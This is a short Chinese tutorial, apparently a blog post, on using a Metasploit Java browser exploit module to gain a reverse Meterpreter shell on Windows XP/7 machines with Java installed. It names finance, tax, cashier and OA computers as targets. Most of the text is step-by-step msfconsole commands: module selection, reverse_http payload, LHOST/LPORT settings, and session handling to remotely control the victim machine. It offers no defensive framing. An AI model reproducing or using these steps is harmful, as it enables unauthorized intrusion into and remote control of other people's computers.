基于java环境的漏洞利用获取shell
前言
一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以利用到这个漏洞
二、操作步骤
1.执行监听设置参数
#开启msf
msfconsole
#设置参数
use exploit/multi/browser/java_jre17_driver_manage #选取所用的模块
show payloads #查看Java模块中可以使用的payload
#从中选择一个payload这里我选择的是7
set /java/meterpreter/reverse_http
set LHOST 192.168.124.3
set LPORT 4444
exploit
2.运行木马构建session
这里会生成一个Local IP将其复制去windows的浏览器中进行复制查询就会出现如图所示的Java升级界面
这里无论你选择那个按钮都会建立sessions
同时会弹出Java运行的界面但开启TRYUAC所以即使关闭这个界面会话仍会存在
通过提示知道会话成功开启而且是session 2
#确认已开启并确认开启session的ID
sessions
session -i XX(ID号)
就返回到建立的会话中输入命令即可对肉机进行远控
总结
通过Java所带的这个漏洞进行利用可以有一个很好的效果,但是这个方法一般只适用于win7 和 xp系统中所以仍会有一定的缺陷